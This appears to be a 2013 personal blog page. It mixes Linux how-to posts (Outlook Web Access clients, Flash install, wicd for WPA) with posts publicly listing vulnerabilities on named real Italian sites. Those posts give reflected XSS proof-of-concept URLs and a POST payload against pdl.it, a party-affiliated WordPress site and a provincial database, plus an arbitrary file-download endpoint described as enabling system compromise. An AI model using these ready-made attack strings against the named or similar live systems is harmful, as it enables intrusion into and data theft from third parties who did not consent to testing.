Friday, 16 August 2013

pdl.it | XSS








 XSS
sample
 http://servizi.pdl.it/cartoline/ancora-in-campo-per-l-italia/cartolina.php?img=ancora-in-campo-per-l-italia.jpg&ico=ancora-in-campo-per-l-italia-ico.jpg&lnk=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C%22bene.php&cartolina=1

also other arguments can be used for the XSS


XSS on another site with wordpress
http://www.gruppopdl-berlusconipresidente.it/wp-admin/admin-ajax.php?action=spiderbigcalendar&theme_id=3&calendar=1&date=2015-08&many_sp_calendar=1&cur_page_url=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

Sunday, 11 August 2013

Access emails from Outlook Web Access with any client email (ex. thunerbird, outlook express, outlook, evolution, pegasus, eudora, foxmail)

Access emails from Outlook Web Access with any client email (ex. thunerbird, outlook express, outlook, evolution, pegasus, eudora, foxmail)

If you are in hurry to download/access all your emails stored (only) on "Outlook Web Access" you can try those softwares:

- DavMail - http://sourceforge.net/projects/davmail/ - for windows 7, windows 8, windows vista, windows xp, linux, MacOsX
- freepops + owa.lua - for windows 7, windows 8, windows vista, windows xp, linux, MacOs X, BeOS .
- Thunderbird + ExQuilla - for windows 7, windows 8, windows vista, windows xp, linux, MacOs X


The most generic and rapid is DavMail























































ecadb.provincia.fe.it | remote files download, XSS, System compromise

http://ecadb.provincia.fe.it/samiraeca/fe/getimage.do?file={your file}

(requests shouldn't be done via browser but with a simple client)

_________________________________________

XSS
http://ecadb.provincia.fe.it/samiraeca/fe/ricercalibera.do
Just use a

a simple search with a term that can be found (ex. "este") and the option to find any submitted word
este <script>alert(1);</script>


Sample POST DATA
value%28VALUE%29=este+%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&value%28TYPE%29=7&value%28OPTION%29=1&value%28TSK%29=scheda_eca&fromform=1


_________________________________________

Etc

Saturday, 10 August 2013

install flash player on lubuntu ubuntu debian older versions | browser chromium, firefox




download: install_flash_player_11_linux.i386.tar.gz

from the official adobe website

uncompress the tar.gz file
tar xvf install_flash_player_11_linux.i386.tar.gz


chromium (in my case Version 25.0.1364.160 Ubuntu 11.10 (25.0.1364.160-0ubuntu0.11.10.1) )

$ sudo cp libflashplayer.so /usr/lib/chromium-browser/plugins/

Mozilla (make sure that you have installed it and the folder exists)
$ sudo cp libflashplayer.so ~/.mozilla/plugin/

and copy all the other files
$ cp -R ./usr/* /usr/



This should work to use flash player on Mozilla firefox and Chromium.
It applies even if (the older) pepper flash doesn't work.
A workaround can be done with the same procedure and the latest versions of adobe flash.

Supported OS:
Linux Lubuntu Flash Player
Linux Debian
Linux Ubuntu
Linux Red Hat

easy WPA on linux lubuntu/ubuntu/debian with GUI User Interface - easy way to use wpa without bad password problem

easy WPA on linux lubuntu/ubuntu/debian with GUI User Interface - easy way to use wpa without bad password problem

For example on Lubuntu we have the network manager that is not acting like expected and the same goes for wpa supplicant (see below)

wpa supplicant installation (NOT SUGGESTED)
wpa supplicant can be installed with those simple commands

$ sudo apt-get install wpasupplicant
and (if you want the gui)
$ sudo apt-get install wpagui

with the main problem is that wpagui doesn't recognize several wifi cards even if available from iwconfig (just read other tutorials if you don't even have the wifi network card shown via iwconfig).

As example this card doesn't show up with wpagui (on lubuntu 11):

description: Wireless interface
product: PRO/Wireless 2200BG [Calexico2] Network Connection
vendor: Intel Corporation
________________________


Fast Solution: 
Just install Wicd by using:
$ sudo apt-get install wicd


If you are still unable to use the wifi (with wpa) connection by getting errors regarding the authorization or bad password (if you are really sure that you are setting the correct password) with wicd on ubuntu/lubuntu just restart the service or reboot.

example:
$ sudo service wicd restart



________________________

Wicd DNS problems are not really problems

If you still have problems with the name resolutions just configure the preferences (global dns servers) of wicd with generic (or your own) DNS servers

example: 8.8.8.8    8.8.4.4  (google dns)

They can be also set for each specific wifi netwok.

Twitter Delicious Facebook Digg Stumbleupon Favorites More